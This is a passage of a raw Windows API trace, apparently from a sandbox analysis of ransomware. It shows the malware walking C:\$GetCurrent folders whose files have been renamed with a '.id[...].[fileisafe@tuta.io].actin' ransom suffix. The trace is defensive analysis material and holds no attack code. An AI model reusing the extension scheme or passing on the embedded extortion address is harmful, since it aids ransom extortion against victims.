SetLastError (dwErrCode=0x0) [0139.983] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10000) returned 0x30a0060 [0139.983] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\*", lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa9050 [0139.984] FindNextFileW (in: hFindFile=0xaa9050, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0139.984] FindNextFileW (in: hFindFile=0xaa9050, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c30e245, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c30e245, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c334508, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xa7e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="downlevel_2017_09_07_02_02_39_766.log.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="DOWNLE~1.ACT")) returned 1 [0139.984] GetLastError () returned 0x0 [0139.984] SetLastError (dwErrCode=0x0) [0139.984] GetLastError () returned 0x0 [0139.984] SetLastError (dwErrCode=0x0) [0139.985] GetLastError () returned 0x0 [0139.985] SetLastError (dwErrCode=0x0) [0139.985] GetLastError () returned 0x0 [0139.985] SetLastError (dwErrCode=0x0) [0139.985] GetLastError () returned 0x0 [0139.985] SetLastError (dwErrCode=0x0) [0139.985] GetLastError () returned 0x0 [0139.985] SetLastError (dwErrCode=0x0) [0139.985] GetLastError () returned 0x0 [0139.985] SetLastError (dwErrCode=0x0) [0139.985] GetLastError () returned 0x0 [0139.985] SetLastError (dwErrCode=0x0) [0139.985] GetLastError () returned 0x0 [0139.985] SetLastError (dwErrCode=0x0) [0139.985] GetLastError () returned 0x0 [0139.985] SetLastError (dwErrCode=0x0) [0139.985] GetLastError () returned 0x0 [0139.985] SetLastError (dwErrCode=0x0) [0139.985] GetLastError () returned 0x0 [0139.985] SetLastError (dwErrCode=0x0) [0139.985] GetLastError () returned 0x0 [0139.985] SetLastError (dwErrCode=0x0) [0139.985] GetLastError () returned 0x0 [0139.986] SetLastError (dwErrCode=0x0) [0139.986] GetLastError () returned 0x0 [0139.986] SetLastError (dwErrCode=0x0) [0139.986] GetLastError () returned 0x0 [0139.986] SetLastError (dwErrCode=0x0) [0139.986] GetLastError () returned 0x0 [0139.986] SetLastError (dwErrCode=0x0) [0139.986] GetLastError () returned 0x0 [0139.986] SetLastError (dwErrCode=0x0) [0139.986] GetLastError () returned 0x0 [0139.986] SetLastError (dwErrCode=0x0) [0139.986] GetLastError () returned 0x0 [0139.986] SetLastError (dwErrCode=0x0) [0139.986] GetLastError () returned 0x0 [0139.986] SetLastError (dwErrCode=0x0) [0139.986] GetLastError () returned 0x0 [0139.986] SetLastError (dwErrCode=0x0) [0139.986] GetLastError () returned 0x0 [0139.986] SetLastError (dwErrCode=0x0) [0139.986] GetLastError () returned 0x0 [0139.986] SetLastError (dwErrCode=0x0) [0139.986] GetLastError () returned 0x0 [0139.986] SetLastError (dwErrCode=0x0) [0139.986] GetLastError () returned 0x0 [0139.987] SetLastError (dwErrCode=0x0) [0139.987] GetLastError () returned 0x0 [0139.987] SetLastError (dwErrCode=0x0) [0139.987] GetLastError () returned 0x0 [0139.987] SetLastError (dwErrCode=0x0) [0139.987] GetLastError () returned 0x0 [0139.987] SetLastError (dwErrCode=0x0) [0139.987] GetLastError () returned 0x0 [0139.987] SetLastError (dwErrCode=0x0) [0139.987] GetLastError () returned 0x0 [0139.987] SetLastError (dwErrCode=0x0) [0139.987] GetLastError () returned 0x0 [0139.987] SetLastError (dwErrCode=0x0) [0139.987] GetLastError () returned 0x0 [0139.987] SetLastError (dwErrCode=0x0) [0139.987] GetLastError () returned 0x0 [0139.987] SetLastError (dwErrCode=0x0) [0139.987] GetLastError () returned 0x0 [0139.987] SetLastError (dwErrCode=0x0) [0139.987] GetLastError () returned 0x0 [0139.987] SetLastError (dwErrCode=0x0) [0139.987] GetLastError () returned 0x0 [0139.987] SetLastError (dwErrCode=0x0) [0139.987] GetLastError () returned 0x0 [0139.988] SetLastError (dwErrCode=0x0) [0139.988] GetLastError () returned 0x0 [0139.988] SetLastError (dwErrCode=0x0) [0139.988] GetLastError () returned 0x0 [0139.988] SetLastError (dwErrCode=0x0) [0139.988] GetLastError () returned 0x0 [0139.988] SetLastError (dwErrCode=0x0) [0139.988] GetLastError () returned 0x0 [0139.988] SetLastError (dwErrCode=0x0) [0139.988] GetLastError () returned 0x0 [0139.988] SetLastError (dwErrCode=0x0) [0139.988] GetLastError () returned 0x0 [0139.988] SetLastError (dwErrCode=0x0) [0139.988] GetLastError () returned 0x0 [0139.988] SetLastError (dwErrCode=0x0) [0139.988] GetLastError () returned 0x0 [0139.988] SetLastError (dwErrCode=0x0) [0139.988] GetLastError () returned 0x0 [0139.988] SetLastError (dwErrCode=0x0) [0139.988] GetLastError () returned 0x0 [0139.988] SetLastError (dwErrCode=0x0) [0139.988] GetLastError () returned 0x0 [0139.988] SetLastError (dwErrCode=0x0) [0139.988] GetLastError () returned 0x0 [0139.989] SetLastError (dwErrCode=0x0) [0139.989] GetLastError () returned 0x0 [0139.989] SetLastError (dwErrCode=0x0) [0139.989] GetLastError () returned 0x0 [0139.989] SetLastError (dwErrCode=0x0) [0139.989] GetLastError () returned 0x0 [0139.989] SetLastError (dwErrCode=0x0) [0139.989] FindNextFileW (in: hFindFile=0xaa9050, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c334508, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c334508, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c334508, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x18a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="oobe_2017_09_07_03_08_57_737.log.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="OOBE_2~1.ACT")) returned 1 [0139.989] GetLastError () returned 0x0 [0139.989] SetLastError (dwErrCode=0x0) [0139.989] GetLastError () returned 0x0 [0139.989] SetLastError (dwErrCode=0x0) [0139.989] GetLastError () returned 0x0 [0139.989] SetLastError (dwErrCode=0x0) [0139.989] GetLastError () returned 0x0 [0139.989] SetLastError (dwErrCode=0x0) [0139.989] GetLastError () returned 0x0 [0139.989] SetLastError (dwErrCode=0x0) [0139.989] GetLastError () returned 0x0 [0139.989] SetLastError (dwErrCode=0x0) [0139.989] GetLastError () returned 0x0 [0139.989] SetLastError (dwErrCode=0x0) [0139.989] GetLastError () returned 0x0 [0139.990] SetLastError (dwErrCode=0x0) [0139.990] GetLastError () returned 0x0 [0139.990] SetLastError (dwErrCode=0x0) [0139.990] GetLastError () returned 0x0 [0139.990] SetLastError (dwErrCode=0x0) [0139.990] GetLastError () returned 0x0 [0139.990] SetLastError (dwErrCode=0x0) [0139.990] GetLastError () returned 0x0 [0139.990] SetLastError (dwErrCode=0x0) [0139.990] GetLastError () returned 0x0 [0139.990] SetLastError (dwErrCode=0x0) [0139.990] GetLastError () returned 0x0 [0139.990] SetLastError (dwErrCode=0x0) [0139.990] GetLastError () returned 0x0 [0139.990] SetLastError (dwErrCode=0x0) [0139.990] GetLastError () returned 0x0 [0139.990] SetLastError (dwErrCode=0x0) [0139.990] GetLastError () returned 0x0 [0139.990] SetLastError (dwErrCode=0x0) [0139.990] GetLastError () returned 0x0 [0139.990] SetLastError (dwErrCode=0x0) [0139.990] GetLastError () returned 0x0 [0139.990] SetLastError (dwErrCode=0x0) [0139.990] GetLastError () returned 0x0 [0139.991] SetLastError (dwErrCode=0x0) [0139.991] GetLastError () returned 0x0 [0139.991] SetLastError (dwErrCode=0x0) [0139.991] GetLastError () returned 0x0 [0139.991] SetLastError (dwErrCode=0x0) [0139.991] GetLastError () returned 0x0 [0139.991] SetLastError (dwErrCode=0x0) [0139.991] GetLastError () returned 0x0 [0139.991] SetLastError (dwErrCode=0x0) [0139.991] GetLastError () returned 0x0 [0139.991] SetLastError (dwErrCode=0x0) [0139.991] GetLastError () returned 0x0 [0139.991] SetLastError (dwErrCode=0x0) [0139.991] GetLastError () returned 0x0 [0139.991] SetLastError (dwErrCode=0x0) [0139.991] GetLastError () returned 0x0 [0139.991] SetLastError (dwErrCode=0x0) [0139.991] GetLastError () returned 0x0 [0139.991] SetLastError (dwErrCode=0x0) [0139.991] GetLastError () returned 0x0 [0139.991] SetLastError (dwErrCode=0x0) [0139.991] GetLastError () returned 0x0 [0139.991] SetLastError (dwErrCode=0x0) [0139.991] GetLastError () returned 0x0 [0139.991] SetLastError (dwErrCode=0x0) [0139.992] GetLastError () returned 0x0 [0139.992] SetLastError (dwErrCode=0x0) [0139.992] GetLastError () returned 0x0 [0139.992] SetLastError (dwErrCode=0x0) [0139.992] GetLastError () returned 0x0 [0139.992] SetLastError (dwErrCode=0x0) [0139.992] GetLastError () returned 0x0 [0139.992] SetLastError (dwErrCode=0x0) [0139.992] GetLastError () returned 0x0 [0139.992] SetLastError (dwErrCode=0x0) [0139.992] GetLastError () returned 0x0 [0139.992] SetLastError (dwErrCode=0x0) [0139.992] GetLastError () returned 0x0 [0139.992] SetLastError (dwErrCode=0x0) [0139.992] GetLastError () returned 0x0 [0139.992] SetLastError (dwErrCode=0x0) [0139.992] GetLastError () returned 0x0 [0139.992] SetLastError (dwErrCode=0x0) [0139.992] GetLastError () returned 0x0 [0139.992] SetLastError (dwErrCode=0x0) [0139.992] GetLastError () returned 0x0 [0139.992] SetLastError (dwErrCode=0x0) [0139.992] GetLastError () returned 0x0 [0139.993] SetLastError (dwErrCode=0x0) [0139.993] GetLastError () returned 0x0 [0139.993] SetLastError (dwErrCode=0x0) [0139.993] GetLastError () returned 0x0 [0139.993] SetLastError (dwErrCode=0x0) [0139.993] GetLastError () returned 0x0 [0139.993] SetLastError (dwErrCode=0x0) [0139.993] GetLastError () returned 0x0 [0139.993] SetLastError (dwErrCode=0x0) [0139.993] GetLastError () returned 0x0 [0139.993] SetLastError (dwErrCode=0x0) [0139.993] GetLastError () returned 0x0 [0139.993] SetLastError (dwErrCode=0x0) [0139.993] GetLastError () returned 0x0 [0139.993] SetLastError (dwErrCode=0x0) [0139.993] GetLastError () returned 0x0 [0139.993] SetLastError (dwErrCode=0x0) [0139.993] GetLastError () returned 0x0 [0139.993] SetLastError (dwErrCode=0x0) [0139.993] FindNextFileW (in: hFindFile=0xaa9050, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c6a1810, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c6a1810, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c7d2e4e, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x142, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="PARTNE~1.ACT")) returned 1 [0139.994] GetLastError () returned 0x0 [0139.994] SetLastError (dwErrCode=0x0) [0139.994] GetLastError () returned 0x0 [0139.994] SetLastError (dwErrCode=0x0) [0139.994] GetLastError () returned 0x0 [0139.994] SetLastError (dwErrCode=0x0) [0139.994] GetLastError () returned 0x0 [0139.994] SetLastError (dwErrCode=0x0) [0139.994] GetLastError () returned 0x0 [0139.994] SetLastError (dwErrCode=0x0) [0139.994] GetLastError () returned 0x0 [0139.994] SetLastError (dwErrCode=0x0) [0139.994] GetLastError () returned 0x0 [0139.994] SetLastError (dwErrCode=0x0) [0139.994] GetLastError () returned 0x0 [0139.994] SetLastError (dwErrCode=0x0) [0139.994] GetLastError () returned 0x0 [0139.994] SetLastError (dwErrCode=0x0) [0139.994] GetLastError () returned 0x0 [0139.994] SetLastError (dwErrCode=0x0) [0139.995] GetLastError () returned 0x0 [0139.995] SetLastError (dwErrCode=0x0) [0139.995] GetLastError () returned 0x0 [0139.995] SetLastError (dwErrCode=0x0) [0139.995] GetLastError () returned 0x0 [0139.995] SetLastError (dwErrCode=0x0) [0139.995] GetLastError () returned 0x0 [0139.995] SetLastError (dwErrCode=0x0) [0139.995] GetLastError () returned 0x0 [0139.995] SetLastError (dwErrCode=0x0) [0139.995] GetLastError () returned 0x0 [0139.995] SetLastError (dwErrCode=0x0) [0139.995] GetLastError () returned 0x0 [0139.995] SetLastError (dwErrCode=0x0) [0139.995] GetLastError () returned 0x0 [0139.995] SetLastError (dwErrCode=0x0) [0139.995] GetLastError () returned 0x0 [0139.995] SetLastError (dwErrCode=0x0) [0139.995] GetLastError () returned 0x0 [0139.995] SetLastError (dwErrCode=0x0) [0139.996] GetLastError () returned 0x0 [0139.996] SetLastError (dwErrCode=0x0) [0139.996] GetLastError () returned 0x0 [0139.996] SetLastError (dwErrCode=0x0) [0139.996] GetLastError () returned 0x0 [0139.996] SetLastError (dwErrCode=0x0) [0139.996] GetLastError () returned 0x0 [0139.996] SetLastError (dwErrCode=0x0) [0139.996] GetLastError () returned 0x0 [0139.996] SetLastError (dwErrCode=0x0) [0139.996] GetLastError () returned 0x0 [0139.996] SetLastError (dwErrCode=0x0) [0139.996] GetLastError () returned 0x0 [0139.996] SetLastError (dwErrCode=0x0) [0139.996] GetLastError () returned 0x0 [0139.996] SetLastError (dwErrCode=0x0) [0139.996] GetLastError () returned 0x0 [0139.996] SetLastError (dwErrCode=0x0) [0139.996] GetLastError () returned 0x0 [0139.996] SetLastError (dwErrCode=0x0) [0139.997] GetLastError () returned 0x0 [0139.997] SetLastError (dwErrCode=0x0) [0139.997] GetLastError () returned 0x0 [0139.997] SetLastError (dwErrCode=0x0) [0139.997] GetLastError () returned 0x0 [0139.997] SetLastError (dwErrCode=0x0) [0139.997] GetLastError () returned 0x0 [0139.997] SetLastError (dwErrCode=0x0) [0139.997] GetLastError () returned 0x0 [0139.997] SetLastError (dwErrCode=0x0) [0139.997] GetLastError () returned 0x0 [0139.997] SetLastError (dwErrCode=0x0) [0139.997] GetLastError () returned 0x0 [0139.997] SetLastError (dwErrCode=0x0) [0139.997] GetLastError () returned 0x0 [0139.997] SetLastError (dwErrCode=0x0) [0139.997] GetLastError () returned 0x0 [0139.997] SetLastError (dwErrCode=0x0) [0139.997] GetLastError () returned 0x0 [0139.997] SetLastError (dwErrCode=0x0) [0139.997] GetLastError () returned 0x0 [0139.997] SetLastError (dwErrCode=0x0) [0139.997] GetLastError () returned 0x0 [0139.997] SetLastError (dwErrCode=0x0) [0139.998] GetLastError () returned 0x0 [0139.998] SetLastError (dwErrCode=0x0) [0139.998] GetLastError () returned 0x0 [0139.998] SetLastError (dwErrCode=0x0) [0139.998] GetLastError () returned 0x0 [0139.998] SetLastError (dwErrCode=0x0) [0139.998] GetLastError () returned 0x0 [0139.998] SetLastError (dwErrCode=0x0) [0139.998] GetLastError () returned 0x0 [0139.998] SetLastError (dwErrCode=0x0) [0139.998] GetLastError () returned 0x0 [0139.998] SetLastError (dwErrCode=0x0) [0139.998] GetLastError () returned 0x0 [0139.998] SetLastError (dwErrCode=0x0) [0139.998] GetLastError () returned 0x0 [0139.998] SetLastError (dwErrCode=0x0) [0139.998] GetLastError () returned 0x0 [0139.998] SetLastError (dwErrCode=0x0) [0139.998] GetLastError () returned 0x0 [0139.998] SetLastError (dwErrCode=0x0) [0139.998] GetLastError () returned 0x0 [0139.998] SetLastError (dwErrCode=0x0) [0139.998] FindNextFileW (in: hFindFile=0xaa9050, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c6a1810, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c6a1810, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c7d2e4e, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x142, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="PARTNE~1.ACT")) returned 0 [0139.998] FindClose (in: hFindFile=0xaa9050 | out: hFindFile=0xaa9050) returned 1 [0139.999] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x30a0060 | out: hHeap=0x26a0000) returned 1 [0139.999] FindNextFileW (in: hFindFile=0xaa93d0, lpFindFileData=0x2f2f7f0 | out: lpFindFileData=0x2f2f7f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0139.999] GetLastError () returned 0x12 [0139.999] SetLastError (dwErrCode=0x12) [0140.000] GetLastError () returned 0x12 [0140.000] SetLastError (dwErrCode=0x12) [0140.000] GetLastError () returned 0x12 [0140.000] SetLastError (dwErrCode=0x12) [0140.000] GetLastError () returned 0x12 [0140.000] SetLastError (dwErrCode=0x12) [0140.000] GetLastError () returned 0x12 [0140.000] SetLastError (dwErrCode=0x12) [0140.000] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10000) returned 0x30a0060 [0140.000] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\*", lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa9050 [0140.001] FindNextFileW (in: hFindFile=0xaa9050, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.001] FindNextFileW (in: hFindFile=0xaa9050, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c4654a7, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c4654a7, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c4b1999, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x233d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentOOBE.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="GETCUR~1.ACT")) returned 1 [0140.002] GetLastError () returned 0x12 [0140.002] SetLastError (dwErrCode=0x12) [0140.002] GetLastError () returned 0x12 [0140.002] SetLastError (dwErrCode=0x12) [0140.002] GetLastError () returned 0x12 [0140.002] SetLastError (dwErrCode=0x12) [0140.002] GetLastError () returned 0x12 [0140.002] SetLastError (dwErrCode=0x12) [0140.002] GetLastError () returned 0x12 [0140.002] SetLastError (dwErrCode=0x12) [0140.002] GetLastError () returned 0x12 [0140.002] SetLastError (dwErrCode=0x12) [0140.002] GetLastError () returned 0x12 [0140.002] SetLastError (dwErrCode=0x12) [0140.002] GetLastError () returned 0x12 [0140.002] SetLastError (dwErrCode=0x12) [0140.002] GetLastError () returned 0x12 [0140.002] SetLastError (dwErrCode=0x12) [0140.002] GetLastError () returned 0x12 [0140.002] SetLastError (dwErrCode=0x12) [0140.002] GetLastError () returned 0x12 [0140.002] SetLastError (dwErrCode=0x12) [0140.002] GetLastError () returned 0x12 [0140.002] SetLastError (dwErrCode=0x12) [0140.002] GetLastError () returned 0x12 [0140.003] SetLastError (dwErrCode=0x12) [0140.003] GetLastError () returned 0x12 [0140.003] SetLastError (dwErrCode=0x12) [0140.003] GetLastError () returned 0x12 [0140.003] SetLastError (dwErrCode=0x12) [0140.003] GetLastError () returned 0x12 [0140.003] SetLastError (dwErrCode=0x12) [0140.003] GetLastError () returned 0x12 [0140.003] SetLastError (dwErrCode=0x12) [0140.003] GetLastError () returned 0x12 [0140.003] SetLastError (dwErrCode=0x12) [0140.003] GetLastError () returned 0x12 [0140.003] SetLastError (dwErrCode=0x12) [0140.003] GetLastError () returned 0x12 [0140.003] SetLastError (dwErrCode=0x12) [0140.003] GetLastError () returned 0x12 [0140.003] SetLastError (dwErrCode=0x12) [0140.003] GetLastError () returned 0x12 [0140.003] SetLastError (dwErrCode=0x12) [0140.003] GetLastError () returned 0x12 [0140.003] SetLastError (dwErrCode=0x12) [0140.003] GetLastError () returned 0x12 [0140.003] SetLastError (dwErrCode=0x12) [0140.003] GetLastError () returned 0x12 [0140.004] SetLastError (dwErrCode=0x12) [0140.004] GetLastError () returned 0x12 [0140.004] SetLastError (dwErrCode=0x12) [0140.004] GetLastError () returned 0x12 [0140.004] SetLastError (dwErrCode=0x12) [0140.004] GetLastError () returned 0x12 [0140.004] SetLastError (dwErrCode=0x12) [0140.004] GetLastError () returned 0x12 [0140.004] SetLastError (dwErrCode=0x12) [0140.004] GetLastError () returned 0x12 [0140.004] SetLastError (dwErrCode=0x12) [0140.004] GetLastError () returned 0x12 [0140.004] SetLastError (dwErrCode=0x12) [0140.004] GetLastError () returned 0x12 [0140.004] SetLastError (dwErrCode=0x12) [0140.004] GetLastError () returned 0x12 [0140.004] SetLastError (dwErrCode=0x12) [0140.004] GetLastError () returned 0x12 [0140.004] SetLastError (dwErrCode=0x12) [0140.004] GetLastError () returned 0x12 [0140.004] SetLastError (dwErrCode=0x12) [0140.004] GetLastError () returned 0x12 [0140.004] SetLastError (dwErrCode=0x12) [0140.004] GetLastError () returned 0x12 [0140.005] SetLastError (dwErrCode=0x12) [0140.005] GetLastError () returned 0x12 [0140.005] SetLastError (dwErrCode=0x12) [0140.005] GetLastError () returned 0x12 [0140.005] SetLastError (dwErrCode=0x12) [0140.005] GetLastError () returned 0x12 [0140.005] SetLastError (dwErrCode=0x12) [0140.005] GetLastError () returned 0x12 [0140.005] SetLastError (dwErrCode=0x12) [0140.005] GetLastError () returned 0x12 [0140.005] SetLastError (dwErrCode=0x12) [0140.005] GetLastError () returned 0x12 [0140.005] SetLastError (dwErrCode=0x12) [0140.005] GetLastError () returned 0x12 [0140.005] SetLastError (dwErrCode=0x12) [0140.005] GetLastError () returned 0x12 [0140.005] SetLastError (dwErrCode=0x12) [0140.005] GetLastError () returned 0x12 [0140.005] SetLastError (dwErrCode=0x12) [0140.005] GetLastError () returned 0x12 [0140.005] SetLastError (dwErrCode=0x12) [0140.005] GetLastError () returned 0x12 [0140.005] SetLastError (dwErrCode=0x12) [0140.005] GetLastError () returned 0x12 [0140.005] SetLastError (dwErrCode=0x12) [0140.006] GetLastError () returned 0x12 [0140.006] SetLastError (dwErrCode=0x12) [0140.006] GetLastError () returned 0x12 [0140.006] SetLastError (dwErrCode=0x12) [0140.006] GetLastError () returned 0x12 [0140.006] SetLastError (dwErrCode=0x12) [0140.006] GetLastError () returned 0x12 [0140.006] SetLastError (dwErrCode=0x12) [0140.006] FindNextFileW (in: hFindFile=0xaa9050, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c73a4a4, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c73a4a4, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c73a4a4, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x1a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentRollback.ini.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="GETCUR~2.ACT")) returned 1 [0140.006] GetLastError () returned 0x12 [0140.006] SetLastError (dwErrCode=0x12) [0140.006] GetLastError () returned 0x12 [0140.006] SetLastError (dwErrCode=0x12) [0140.006] GetLastError () returned 0x12 [0140.006] SetLastError (dwErrCode=0x12) [0140.006] GetLastError () returned 0x12 [0140.006] SetLastError (dwErrCode=0x12) [0140.006] GetLastError () returned 0x12 [0140.006] SetLastError (dwErrCode=0x12) [0140.006] GetLastError () returned 0x12 [0140.006] SetLastError (dwErrCode=0x12) [0140.006] GetLastError () returned 0x12 [0140.006] SetLastError (dwErrCode=0x12) [0140.006] GetLastError () returned 0x12 [0140.007] SetLastError (dwErrCode=0x12) [0140.007] GetLastError () returned 0x12 [0140.007] SetLastError (dwErrCode=0x12) [0140.007] GetLastError () returned 0x12 [0140.007] SetLastError (dwErrCode=0x12) [0140.007] GetLastError () returned 0x12 [0140.007] SetLastError (dwErrCode=0x12) [0140.007] GetLastError () returned 0x12 [0140.007] SetLastError (dwErrCode=0x12) [0140.007] GetLastError () returned 0x12 [0140.007] SetLastError (dwErrCode=0x12) [0140.007] GetLastError () returned 0x12 [0140.007] SetLastError (dwErrCode=0x12) [0140.007] GetLastError () returned 0x12 [0140.007] SetLastError (dwErrCode=0x12) [0140.007] GetLastError () returned 0x12 [0140.007] SetLastError (dwErrCode=0x12) [0140.007] GetLastError () returned 0x12 [0140.007] SetLastError (dwErrCode=0x12) [0140.007] GetLastError () returned 0x12 [0140.007] SetLastError (dwErrCode=0x12) [0140.007] GetLastError () returned 0x12 [0140.007] SetLastError (dwErrCode=0x12) [0140.007] GetLastError () returned 0x12 [0140.007] SetLastError (dwErrCode=0x12) [0140.007] GetLastError () returned 0x12 [0140.008] SetLastError (dwErrCode=0x12) [0140.008] FindNextFileW (in: hFindFile=0xaa9050, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c73a4a4, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c73a4a4, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c73a4a4, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x362, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupComplete.cmd.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="PARTNE~1.ACT")) returned 1 [0140.008] FindNextFileW (in: hFindFile=0xaa9050, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c760448, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c760448, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c760448, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x142, dwReserved0=0x0, dwReserved1=0x0, cFileName="preoobe.cmd.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="PREOOB~1.ACT")) returned 1 [0140.008] FindNextFileW (in: hFindFile=0xaa9050, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c760448, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c760448, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c760448, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, 